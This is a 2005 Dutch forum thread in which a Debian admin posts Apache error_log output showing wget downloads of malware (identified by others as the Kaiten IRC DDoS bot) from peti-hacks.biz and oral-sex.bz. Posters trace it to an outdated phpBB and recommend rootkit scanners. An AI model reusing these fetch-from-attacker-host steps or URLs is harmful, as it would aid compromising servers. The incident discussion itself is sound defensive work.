[Debian] petit-hacks.biz?? - Linux en overige clients

maandag 18 juli 2005 22:41

Acties:

|true

Topicstarter

Ik zag vanmiddag iets raars in me error_log van apache (debian unstable)

--22:26:43-- http://peti-hacks.biz/k
=> `k'
Resolving peti-hacks.biz... 62.67.235.49
Connecting to peti-hacks.biz|62.67.235.49|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,817 (31K) [text/plain]

0K .......... .......... .......... . 100% 387.12 KB/s

22:26:46 (387.12 KB/s) - `k' saved [31817/31817]

--20:50:57-- http://peti-hacks.biz/k
=> `k'
Resolving peti-hacks.biz... 62.67.235.49
Connecting to peti-hacks.biz|62.67.235.49|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,817 (31K) [text/plain]

0K .......... .......... .......... . 100% 365.10 KB/s

20:50:57 (365.10 KB/s) - `k' saved [31817/31817]

--21:12:56-- http://peti-hacks.biz/k
=> `k'
Resolving peti-hacks.biz... 62.67.235.49
Connecting to peti-hacks.biz|62.67.235.49|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,817 (31K) [text/plain]

0K .......... .......... .......... . 100% 490.66 KB/s

21:12:56 (490.66 KB/s) - `k' saved [31817/31817]

en kan nog zo wel ff doorgaan....

hier door krijgt apache een

[sh] <defunct>

oid.

Er is hier totaal neits over te zien.. Het lijkt net een aanval oid... maar wat kan het wezen.. want me webserver wordt er bok traag van

ps.
in me syslog / messages staat voor de rest niets alleen in de error_log dus

[ Voor 5% gewijzigd door Ankh op 18-07-2005 22:42 ]

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

maandag 18 juli 2005 22:44

Acties:

Newjersey

draai even een chkrootkit op je server, ik heb het zelfde gehad.. had een oude versie van awstats (die naar enig searchen vulnerable bleek te zijn).

maandag 18 juli 2005 22:52

Acties:

GlowMouse

Als ik http://peti-hacks.biz/k bekijk, lijkt het te gaan om Kaiten, een IRC-based DDOS ding (Google).

Het is even de vraag of jouw systeem als proxy is gebruikt. Misschien kun je met netstat verbindingen zien met vreemde hosts (IRC servers draaien vaak (maar niet altijd, zeker deze niet) op poort 6667). Als je niets ziet, zegt dat vaak nog niets, omdat een beetje tool netstat aanpast om zichzelf te verbergen.

maandag 18 juli 2005 23:04

Acties:

Newjersey

GlowMouse schreef op maandag 18 juli 2005 @ 22:52:
Als ik http://peti-hacks.biz/k bekijk, lijkt het te gaan om Kaiten, een IRC-based DDOS ding (Google).

Het is even de vraag of jouw systeem als proxy is gebruikt. Misschien kun je met netstat verbindingen zien met vreemde hosts (IRC servers draaien vaak (maar niet altijd, zeker deze niet) op poort 6667). Als je niets ziet, zegt dat vaak nog niets, omdat een beetje tool netstat aanpast om zichzelf te verbergen.

ook jezelf nmappen kan hierbij helpen, dat geeft zeker geen valse informatie weer, zoals ze bij netstat vaak kunnen doen (wat je boven al zegt)

dinsdag 19 juli 2005 07:30

Acties:

Ankh

|true

Topicstarter

het enige wat ik voor irc draai is mijn eigen psybnc

maar het die lijkt het me neit te zijn.. maar goed ik hou het even in de gaten

daarnet lag de halve webserver er weer uit, bok traag natuurtlijk

Newjersey schreef op maandag 18 juli 2005 @ 22:44:
draai even een chkrootkit op je server, ik heb het zelfde gehad.. had een oude versie van awstats (die naar enig searchen vulnerable bleek te zijn).

heb ik gedraait maar geen zwakke plekken... beetje jammer maar goed

ik ga vanmiddag eens uitpleuzen...

[ Voor 48% gewijzigd door Ankh op 19-07-2005 07:35 ]

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

dinsdag 19 juli 2005 07:38

Acties:

Cybje

First Post!

Ik kom het wel vaker tegen, gezien ik een webhostingbedrijf heb. Heb je gewoon een script dat weer eens een flinke security bug bevat (PHPbb had toen een vrij bekende) en dan kunnen ze scripts draaien op je server. Op zich kan het niet veel kwaad, want normaal gesproken hebben ze geen toegang tot je server, behalve dan tot de gebruiker waar je webserver onder draait. Iets meer kwaad kan het als ze met een aanval beginnen, want dan ligt jouw lijn er uit, maar de 'target' van de attack is er ook niet bepaald gelukkig mee.

Oftewel: probeer zo snel mogelijk het probleem op te lossen. Kill alle processen, probeer te vinden van de scripts die je hebt welke security bugs hebben. Kun je het niet vinden, zet eventueel voor de zekerheid even je webserver uit, gezien het niet echt goed is voor internet, als iedereen attacks gaat uitvoeren of gaat toestaan dat ze uitgevoerd worden.

Wat ruist er door het struikgewas

dinsdag 19 juli 2005 12:29

Acties:

Ankh

|true

Topicstarter

woei weer wat nieuws...:

--11:25:39-- http://peti-hacks.biz/k
=> `k'
Resolving peti-hacks.biz... 62.67.235.49
Connecting to peti-hacks.biz|62.67.235.49|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
11:25:39 ERROR 403: Forbidden.

mv: cannot stat `k': No such file or directory
--11:30:30-- http://oral-sex.bz/up
=> `up'
Resolving oral-sex.bz... 213.239.211.98
Connecting to oral-sex.bz|213.239.211.98|:80... connected.
HTTP request sent, awaiting response... sh: KILLALL: command not found
200 OK
Length: 34,881 (34K) [text/plain]

0K .......... .......... .......... .... 100% 958.10 KB/s

11:30:47 (958.10 KB/s) - `up' saved [34881/34881]

webserver was niet te bereiken... daarnet.. (ssh box was ook bok traag..) kon nog net apache opnieuw opstarten.. gelukkig

hier nog een uitdraai van ps aux.. net na de reboot van apache..
http://scarab.only4clans.com/psaux.txt
ik ga eens rond snuffelen of iemand er wat vanaf weet.. en welk programma er vunerable is.. (zal me niets verbazen dat het iets is met phpBB)

[ Voor 15% gewijzigd door Ankh op 19-07-2005 12:34 ]

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

woensdag 27 juli 2005 00:22

Acties:

Nyko

SCaRaBaeuS schreef op dinsdag 19 juli 2005 @ 12:29:
woei weer wat nieuws...:

[...]

webserver was niet te bereiken... daarnet.. (ssh box was ook bok traag..) kon nog net apache opnieuw opstarten.. gelukkig

hier nog een uitdraai van ps aux.. net na de reboot van apache..
http://scarab.only4clans.com/psaux.txt
ik ga eens rond snuffelen of iemand er wat vanaf weet.. en welk programma er vunerable is.. (zal me niets verbazen dat het iets is met phpBB)

Ik heb precies het zelfde, had phpbb 2.0.15 nog draaien en daardoor is het gekomen volgens mij.
Die maar metteen geupdate.

Me apache gebruikte 100% cpu en ging aardig wat verkeerd overheen.
enigste wat ik er nog niet afkrijg is dat ie elke keer het progie start "mfqgtmiir" opstart wat ik via netstat zie maar is nergens in het systeem tevinden.

ps die rootkits waar/welke kan ik het beste gebruiken ?

Life is a bitch, then you die.

woensdag 27 juli 2005 01:48

Acties:

Ankh

|true

Topicstarter

chkrootkits en rkhunter (www.rootkits.nl) werken persoonlijk het beste

probleem is trouwens gerepareerd idd met nieuwe versie van phpBB, we hebben het nu ook in de voorwaarden neergezet. Hopelijk blijft alles goed gaan

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

woensdag 27 juli 2005 08:44

Acties:

Nyko

SCaRaBaeuS schreef op woensdag 27 juli 2005 @ 01:48:
chkrootkits en rkhunter (www.rootkits.nl) werken persoonlijk het beste

probleem is trouwens gerepareerd idd met nieuwe versie van phpBB, we hebben het nu ook in de voorwaarden neergezet. Hopelijk blijft alles goed gaan

thx, ga meteen ff ermee aan de slag.

Life is a bitch, then you die.

woensdag 27 juli 2005 09:33

Acties:

Nick_S

++?????++ Out of Cheese Error

Het is trouwens http://www.rootkit.nl. Just so you know!

'Nae King! Nae quin! Nae Laird! Nae master! We willna' be fooled agin!'